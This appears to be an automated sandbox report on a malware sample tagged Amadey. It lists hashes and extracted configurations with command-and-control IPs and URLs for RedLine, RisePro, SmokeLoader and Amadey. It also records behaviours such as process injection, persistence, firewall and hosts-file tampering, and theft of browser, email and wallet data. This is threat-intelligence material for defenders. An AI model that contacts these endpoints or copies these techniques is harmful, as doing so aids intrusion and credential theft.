amadey | 3327cc6fb53096ad4d5cb9c64020823eebb56549fd8285f244e4d8e5bd478ef0

Analysis

max time kernel
300s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2023 18:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample1.exe
Size

1.4MB
MD5

3c3dcd9577aa14984b2727cf9b4abd23
SHA1

63cda7e96fd1c59efd0b35f8c7baef9b61026004
SHA256

3327cc6fb53096ad4d5cb9c64020823eebb56549fd8285f244e4d8e5bd478ef0
SHA512

1f974189e4d5cadca0f29f7fcb8e02fa5a1abdf0e36bc7d950d4fa39289b88578d01f9677a1a272b66b285ad380bb763cb599880c092bddb287727410fa626f6
SSDEEP

24576:Zy8ml94AOkdt2T6uMbgSmNjhT14LV6Huamocy6xynKZRa38/Yv9OPYc:M8m3Tt1bgSWB1MV+SocLoKe3EYvAP

Malware Config

Extracted

Family

redline

Botnet

horda

194.49.94.152:19053

Extracted

Family

risepro

194.49.94.152

Extracted

Family

smokeloader

Version

2022

http://194.49.94.210/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

amadey

Version

4.12

http://brodoyouevenlift.co.za

Attributes

install_dir
ce3eb8f6b2
install_file
Utsysc.exe
strings_key
c5b804d7b4c8a99f5afb89e5203cf3ba
url_paths
/g9sdjScV2/index.php

/vdhe8ejs3/index.php

rc4.plain

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

redline

Botnet

LiveTraffic

195.10.205.16:1056

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4600-347-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-420-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-468-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-524-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2088-547-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3004-14-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\FBD5.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\FBD5.exe	family_redline
behavioral1/memory/1240-48-0x00000000008A0000-0x00000000008DE000-memory.dmp	family_redline
behavioral1/memory/3684-78-0x0000000000540000-0x000000000059A000-memory.dmp	family_redline
behavioral1/memory/3684-79-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/1096-442-0x0000000000500000-0x000000000053E000-memory.dmp	family_redline
behavioral1/memory/4904-452-0x0000000000150000-0x000000000018C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

Processes:

latestX.exeupdater.exe

description	pid	process	target process
PID 2928 created 3140	2928	latestX.exe	Explorer.EXE
PID 2928 created 3140	2928	latestX.exe	Explorer.EXE
PID 2928 created 3140	2928	latestX.exe	Explorer.EXE
PID 2928 created 3140	2928	latestX.exe	Explorer.EXE
PID 2928 created 3140	2928	latestX.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE
PID 3364 created 3140	3364	updater.exe	Explorer.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

59 4116 powershell.exe
67 4116 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

latestX.exeupdater.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts latestX.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

4972 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
59	4116	powershell.exe
67	4116	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

pid	process
4972	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Utsysc.exeFCB0.exe3140.exe1F2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	Utsysc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	FCB0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	3140.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation	1F2.exe

Executes dropped EXE 50 IoCs

Processes:

Fb8dm28.exe2Md4671.exe4lk161Fz.exe5HD6In9.exeFBD5.exeFCB0.exeFEC5.exe1F2.exe1F2.exeUtsysc.exetoolspub2.exeUtsysc.exeUtsysc.exe559212.exe3140.exeInstallSetup5.exetoolspub2.exe31839b57a4f11171d6abc8bbc4451ee4.exelatestX.exeBroom.exeConhost.exeUtsysc.exe31839b57a4f11171d6abc8bbc4451ee4.exeRsopprbwlid.exejsc.exeA559.exeA9FE.exeABD3.exeinjector.exeHResult.exe698.exe8CB.execsrss.exeUtsysc.exeupdater.exeIntyweuri.pngHResult.exesc.exewindefender.exewindefender.exeUtsysc.exeUtsysc.exef801950a962ddba14caaa44bf084b55c.exeUtsysc.exeUtsysc.exeUtsysc.exeUtsysc.exe

pid	process
5056	Fb8dm28.exe
1728	2Md4671.exe
2792	4lk161Fz.exe
4940	5HD6In9.exe
1240	FBD5.exe
1304	FCB0.exe
3684	FEC5.exe
1884	1F2.exe
1300	1F2.exe
3928	Utsysc.exe
3736	toolspub2.exe
2612	Utsysc.exe
4944	Utsysc.exe
5024	559212.exe
4256	3140.exe
2068	InstallSetup5.exe
2680	toolspub2.exe
4600	31839b57a4f11171d6abc8bbc4451ee4.exe
2928	latestX.exe
436	Broom.exe
4848
3736	toolspub2.exe
2328	Conhost.exe
3300	Utsysc.exe
2088	31839b57a4f11171d6abc8bbc4451ee4.exe
820	Rsopprbwlid.exe
4904	jsc.exe
3492	A559.exe
4236	A9FE.exe
4188	ABD3.exe
2672	injector.exe
4088	HResult.exe
1488	698.exe
2548	8CB.exe
1248	csrss.exe
3324	Utsysc.exe
3364	updater.exe
3820	Intyweuri.png
2672	injector.exe
2780	HResult.exe
2044	sc.exe
3656	windefender.exe
4996	windefender.exe
2256	Utsysc.exe
2344	Utsysc.exe
4348	f801950a962ddba14caaa44bf084b55c.exe
2376	Utsysc.exe
4324	Utsysc.exe
1440	Utsysc.exe
1028	Utsysc.exe

Loads dropped DLL 5 IoCs

Processes:

FCB0.exeFEC5.exe

pid process

1304 FCB0.exe
1304 FCB0.exe
3684 FEC5.exe
3684 FEC5.exe
1304 FCB0.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1304	FCB0.exe
1304	FCB0.exe
3684	FEC5.exe
3684	FEC5.exe
1304	FCB0.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

csrss.exesample1.exeFb8dm28.exe31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	sample1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Fb8dm28.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

73 ip-api.com
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

flow	ioc
73	ip-api.com

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exeConhost.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	Conhost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	Conhost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 21 IoCs

Processes:

2Md4671.exe4lk161Fz.exe1F2.exepowershell.exetoolspub2.exeRsopprbwlid.exeConhost.exeA559.exeA9FE.exeABD3.exeHResult.exeUtsysc.exeHResult.exeaspnet_compiler.exeupdater.exeUtsysc.exeaspnet_compiler.exeUtsysc.exeUtsysc.exe

description	pid	process	target process
PID 1728 set thread context of 3004	1728	2Md4671.exe	AppLaunch.exe
PID 2792 set thread context of 1284	2792	4lk161Fz.exe	AppLaunch.exe
PID 1884 set thread context of 1300	1884	1F2.exe	1F2.exe
PID 3928 set thread context of 4944	3928	powershell.exe	Utsysc.exe
PID 2680 set thread context of 3736	2680	toolspub2.exe	toolspub2.exe
PID 4848 set thread context of 3300	4848		Utsysc.exe
PID 820 set thread context of 4904	820	Rsopprbwlid.exe	jsc.exe
PID 2328 set thread context of 1096	2328	Conhost.exe	jsc.exe
PID 3492 set thread context of 4904	3492	A559.exe	jsc.exe
PID 4236 set thread context of 316	4236	A9FE.exe	AppLaunch.exe
PID 4188 set thread context of 4544	4188	ABD3.exe	AppLaunch.exe
PID 4088 set thread context of 2780	4088	HResult.exe	HResult.exe
PID 3324 set thread context of 2044	3324	Utsysc.exe	sc.exe
PID 2780 set thread context of 2188	2780	HResult.exe	aspnet_compiler.exe
PID 2188 set thread context of 4588	2188	aspnet_compiler.exe	aspnet_compiler.exe
PID 3364 set thread context of 2244	3364	updater.exe	conhost.exe
PID 3364 set thread context of 4728	3364	updater.exe	explorer.exe
PID 2256 set thread context of 2344	2256	Utsysc.exe	Utsysc.exe
PID 4588 set thread context of 1652	4588	aspnet_compiler.exe	AddInProcess.exe
PID 2376 set thread context of 4324	2376	Utsysc.exe	Utsysc.exe
PID 1440 set thread context of 1028	1440	Utsysc.exe	Utsysc.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe
Drops file in Program Files directory 2 IoCs

Processes:

latestX.exeupdater.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe latestX.exe
File created C:\Program Files\Google\Libs\WR64.sys updater.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 4 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.execsrss.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe

Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1544 sc.exe
1020 sc.exe
4996 sc.exe
1240 sc.exe
2748 sc.exe
4992 sc.exe
1508 sc.exe
1588 sc.exe
2768 sc.exe
4820 sc.exe
2044 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

404 3684 WerFault.exe FEC5.exe
3564 4236 WerFault.exe A9FE.exe
4012 3820 WerFault.exe Intyweuri.png

pid	process
1544	sc.exe
1020	sc.exe
4996	sc.exe
1240	sc.exe
2748	sc.exe
4992	sc.exe
1508	sc.exe
1588	sc.exe
2768	sc.exe
4820	sc.exe
2044	sc.exe

pid	pid_target	process	target process
404	3684	WerFault.exe	FEC5.exe
3564	4236	WerFault.exe	A9FE.exe
4012	3820	WerFault.exe	Intyweuri.png

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

5HD6In9.exetoolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5HD6In9.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5HD6In9.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5HD6In9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FCB0.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	FCB0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	FCB0.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2672 schtasks.exe
2176 schtasks.exe
3532 schtasks.exe

pid	process
2672	schtasks.exe
2176	schtasks.exe
3532	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exewindefender.exe31839b57a4f11171d6abc8bbc4451ee4.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exeexplorer.exeConhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2891 = "Sudan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2942 = "Sao Tome Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5HD6In9.exeExplorer.EXE

pid	process
4940	5HD6In9.exe
4940	5HD6In9.exe
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
3140	Explorer.EXE
